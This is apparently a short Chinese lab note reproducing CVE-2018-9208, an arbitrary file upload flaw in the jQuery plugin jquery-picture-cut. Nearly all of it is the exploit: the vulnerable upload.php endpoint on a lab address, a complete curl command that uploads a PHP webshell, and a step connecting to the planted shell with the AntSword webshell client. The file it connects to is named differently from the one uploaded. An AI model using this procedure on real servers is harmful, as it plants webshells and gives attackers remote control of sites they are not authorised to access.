Close

29 6 月, 2024

(CVE-2018-9208)

jquery-picture-cut 任意文件上传(CVE-2018-9208)

上传文件连接:http://192.168.85.130:21826/jquery-picture-cut/src/php/upload.php

上传报文:curl -F “inputOfFile=file” -F “request=upload” -F “enableResize=0” -F “minimumWidthToResize=0” -F “minimumHeightToResize=0” -F “folderOnServer=/” -F “imageNameRandom=1” -F “maximumSize=10000” -F “enableMaximumSize=0” -F “file=@shell.php” http://192.168.85.130:21826/jquery-picture-cut/src/php/upload.php

用中国蚁剑连接:http://192.168.85.130:21826/exp.php